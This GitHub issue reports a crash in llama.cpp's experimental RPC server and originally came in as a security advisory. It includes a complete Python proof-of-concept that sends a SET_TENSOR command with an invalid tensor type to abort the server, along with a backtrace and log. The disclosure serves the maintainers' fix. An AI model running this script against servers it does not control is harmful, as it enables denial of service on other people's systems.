Skip to content

Misc. bug: RPC server crash on SET_TENSOR with invalid ggml_type #13067

Closed
@thevilledev

Description

@thevilledev

Name and Version

$ llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M1 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend RPC (0 devices)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M1 Pro)
version: 5169 (6cf3a31e)
built with Apple clang version 17.0.0 (clang-1700.0.13.3) for arm64-apple-darwin24.4.0

Operating systems

Mac

Which llama.cpp modules do you know to be affected?

Other (Please specify in the next section)

Command line

./build/bin/rpc-server -p 50052

Problem description & steps to reproduce

Description

NOTE: This was originally reported as a security advisory. After discussing with the maintainers this has now been disclosed as a public issue, since the RPC server is still an experimental feature (see RPC example).

The rpc-server crashes when processing an RPC_CMD_SET_TENSOR command if the provided data contains an invalid ggml_type value within the rpc_tensor structure. The server doesn't validate the type field read from the network before using it internally. This leads to a failed assertion (GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT)) during tensor deserialization (likely in ggml_new_tensor_4d), causing the server process to abort().

Expected Behavior

The server should validate the ggml_type read from the SET_TENSOR data before passing it to GGML functions. If the type is invalid, the server should:

  • Log an error message indicating invalid input.
  • Reject the command (e.g., send an error response or simply close the connection).
  • Continue running without crashing.

Actual Behavior

The server reads the invalid ggml_type (e.g., 65 if the payload starts with 'A' bytes) and uses it internally. A GGML_ASSERT checking the type validity fails, causing the server process to terminate via abort(). The client typically sees the connection break unexpectedly.

Steps to Reproduce

  1. Clone the repository: git clone [email protected]:ggml-org/llama.cpp.git && cd llama.cpp
  2. Build the rpc-server binary: cmake -B build . -DGGML_RPC=ON && cd build && cmake --build . --config Release --target rpc-server
  3. Run the server from the build directory: ./bin/rpc-server -p 50052
  4. Run the Python Proof of Concept script below (save as poc_rpc_crash.py): python poc_rpc_crash.py
import socket
import struct
import sys
import time

# Server details (change if needed)
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 50052

# GGML RPC Commands (enum rpc_cmd)
RPC_CMD_SET_TENSOR = 6
RPC_CMD_HELLO = 14

# Size definitions
PAYLOAD_DATA_SIZE = 1 * 1024 # 1 KB of 'A's
INTERNAL_SIZE_FIELD_VAL = PAYLOAD_DATA_SIZE # Value for the internal size field
CHUNK_SIZE = 1024 # Send data in 1KB chunks

# --- Helper Functions ---

def p8(value):
    """Packs an integer into a 1-byte byte string (unsigned char)."""
    return struct.pack('<B', value)

def p64(value):
    """Packs an integer into an 8-byte byte string (unsigned long long)."""
    return struct.pack('<Q', value)

def u64(value_bytes):
    """Unpacks an 8-byte byte string into an integer (unsigned long long)."""
    return struct.unpack('<Q', value_bytes)[0]

def recv_exact(sock, num_bytes):
    """Receives exactly num_bytes from the socket."""
    data = b''
    start_time = time.time()
    # Use socket timeout if set
    timeout = sock.gettimeout()

    while len(data) < num_bytes:
        try:
            # Check for timeout if applicable
            if timeout and (time.time() - start_time > timeout):
                print(f"[-] Socket timeout after {timeout}s waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            # Calculate remaining bytes, request at most CHUNK_SIZE
            remaining = num_bytes - len(data)
            chunk = sock.recv(min(remaining, CHUNK_SIZE))
            if not chunk:
                # Connection closed prematurely
                print(f"[-] Connection closed by peer while trying to receive {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            data += chunk
        except socket.timeout:
            print(f"[-] Socket timeout explicitly caught waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
            return None
        except OSError as e:
            print(f"[-] Socket error during recv_exact: {e}", file=sys.stderr)
            return None
    return data

def send_all(sock, data):
    """Sends all data reliably."""
    try:
        sock.sendall(data)
        return True
    except OSError as e:
        print(f"[-] Socket error during send_all: {e}", file=sys.stderr)
        return False

def send_data_chunks_native(sock, size):
    """Sends 'size' bytes of 'A' in chunks using standard sockets."""
    bytes_sent = 0
    num_chunks = (size + CHUNK_SIZE - 1) // CHUNK_SIZE
    for i in range(num_chunks):
        current_chunk_size = min(CHUNK_SIZE, size - bytes_sent)
        chunk = b'A' * current_chunk_size
        if not send_all(sock, chunk):
            print(f"[-] Failed to send chunk {i+1}", file=sys.stderr)
            return False
        bytes_sent += current_chunk_size
    return True

# --- Main Logic ---

def run_exploit_native(host, port):
    print(f"[*] Connecting to {host}:{port}...")
    sock = None
    try:
        # Set a connection timeout
        sock = socket.create_connection((host, port), timeout=10)
        print("[+] Connected.")
        # Set a timeout for subsequent socket operations
        sock.settimeout(15)

        print("[*] Performing HELLO handshake...")
        hello_cmd = p8(RPC_CMD_HELLO)
        hello_input_size = p64(0)
        hello_packet = hello_cmd + hello_input_size
        if not send_all(sock, hello_packet): raise ConnectionError("Failed to send HELLO packet")

        hello_resp_size_bytes = recv_exact(sock, 8)
        if not hello_resp_size_bytes: raise ConnectionError("Server closed during HELLO response size read")
        hello_resp_size = u64(hello_resp_size_bytes)

        # Expecting 3 bytes: major, minor, patch version
        if hello_resp_size < 3:
            # Allow for potential future expansion, but need at least 3 for version
            print(f"[!] Warning: Unexpected HELLO response size: {hello_resp_size}. Expected >= 3.")
            # Attempt to read anyway if size > 0
            if hello_resp_size == 0:
                 raise ValueError("HELLO response size is zero.")

        hello_resp_data = recv_exact(sock, hello_resp_size)
        if not hello_resp_data or len(hello_resp_data) < 3:
            raise ConnectionError("Incomplete HELLO response data received")
        print(f"[+] HELLO ok (v{hello_resp_data[0]}.{hello_resp_data[1]}.{hello_resp_data[2]}) Received {len(hello_resp_data)} bytes total.")

        print("[*] Attempting crash via SET_TENSOR with invalid type in 1KB payload...")
        cmd = p8(RPC_CMD_SET_TENSOR)

        # This is the size field read by recv_msg to determine buffer size
        internal_size_field = p64(INTERNAL_SIZE_FIELD_VAL)

        # This is the 'total payload size' field sent after the command byte.
        # It should reflect the size of data *following* this field.
        # In this case, it's the internal_size_field (8 bytes) + the actual garbage data (PAYLOAD_DATA_SIZE bytes)
        actual_payload_size_val = 8 + PAYLOAD_DATA_SIZE
        actual_payload_size_field = p64(actual_payload_size_val)

        # Header: command_byte (1) + actual_payload_size (8) + internal_size_field (8)
        fixed_header = cmd + actual_payload_size_field + internal_size_field
        print(f"[*] Sending header (Cmd: {RPC_CMD_SET_TENSOR}, TotalPayloadSize: {actual_payload_size_val}, InternalResizeField: {u64(internal_size_field):#x}) -> {len(fixed_header)} bytes")

        if not send_all(sock, fixed_header):
            raise ConnectionError("Failed to send fixed header")

        # Send the 1KB garbage data ('A' * 1024)
        print(f"[*] Sending {PAYLOAD_DATA_SIZE} bytes of garbage data ('A' * {PAYLOAD_DATA_SIZE})...")
        if not send_data_chunks_native(sock, PAYLOAD_DATA_SIZE):
             raise ConnectionError("Failed during data chunk send")
        print(f"[+] Header and {PAYLOAD_DATA_SIZE} bytes of data sent.")

        # Expect the server to crash after receiving data and trying to process it
        print("[*] Waiting for server disconnect (expecting crash after processing header)...")
        # Try receiving a small amount of data. An empty read means disconnected (crashed).
        # Using a longer timeout here as processing might take a moment before crash
        sock.settimeout(10)
        recv_data = None
        try:
            recv_data = sock.recv(1024)
        except socket.timeout:
            # This could happen if the server hangs instead of crashing, less likely for this specific bug
            print("[-] Timeout waiting for server disconnect. Server might be hung?")
            # Still consider it potentially successful if timeout occurs after sending bad data
            print("[?] Vulnerability might still be triggered if server is unresponsive.")
            return # Exit gracefully
        except OSError as e:
             # Connection reset/broken pipe often indicates server crash
            print(f"[+] Socket error likely indicating server crash: {e}. Vulnerability Confirmed.")
            return # Exit gracefully

        if recv_data:
            print(f"[-] Received unexpected data ({len(recv_data)} bytes): {recv_data[:64]}... Server might not have crashed.")
        else:
            # recv() returning 0 bytes means the other side closed the connection cleanly.
            print("[+] Connection closed by server (received 0 bytes - likely crashed due to assertion failure). Vulnerability Confirmed.")

    except ConnectionRefusedError:
        print(f"[-] Connection refused by {host}:{port}. Is the server running?", file=sys.stderr)
    except socket.timeout:
         print("[-] Timeout during connection or initial handshake. Check server state.", file=sys.stderr)
    except (ConnectionError, ValueError, OSError, struct.error) as e:
        print(f"[-] An error occurred: {e}", file=sys.stderr)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}", file=sys.stderr)
        import traceback
        traceback.print_exc()
    finally:
        if sock:
            sock.close()
            print("[*] Connection closed.")

if __name__ == "__main__":
    target_host = DEFAULT_HOST
    target_port = DEFAULT_PORT
    if len(sys.argv) > 1:
        target_host = sys.argv[1]
    if len(sys.argv) > 2:
        try:
            target_port = int(sys.argv[2])
        except ValueError:
            print(f"[-] Invalid port: {sys.argv[2]}", file=sys.stderr)
            sys.exit(1)

    run_exploit_native(target_host, target_port)

Debugger backtrace to confirm crash:

* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x0000000199164388 libsystem_kernel.dylib`__pthread_kill + 8
    frame #1: 0x000000019919d88c libsystem_pthread.dylib`pthread_kill + 296
    frame #2: 0x00000001990a6c60 libsystem_c.dylib`abort + 124
    frame #3: 0x000000010032d31c libggml-base.dylib`ggml_abort + 116
    frame #4: 0x000000010032eb54 libggml-base.dylib`ggml_new_tensor_impl + 824
    frame #5: 0x000000010032ed08 libggml-base.dylib`ggml_new_tensor_4d + 56
    frame #6: 0x000000010005ed18 libggml-rpc.dylib`rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) + 56
    frame #7: 0x000000010005f208 libggml-rpc.dylib`rpc_server::set_tensor(std::__1::vector<unsigned char, std::__1::allocator<unsigned char>> const&) + 136
    frame #8: 0x00000001000610ac libggml-rpc.dylib`ggml_backend_rpc_start_server + 2008
    frame #9: 0x0000000100003214 rpc-server`main + 3012
    frame #10: 0x0000000198dfeb4c dyld`start + 6000

First Bad Commit

5e31828

Relevant log output

Starting RPC server v1.0.0
  endpoint       : 127.0.0.1:50052
  local cache    : n/a
  backend memory : 16384 MB
Accepted client connection, free_mem=17179869184, total_mem=17179869184
/Users/ville/git/llama.cpp/ggml/src/ggml.c:1568: GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT) failed
[1]    61001 abort      ./bin/rpc-server

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions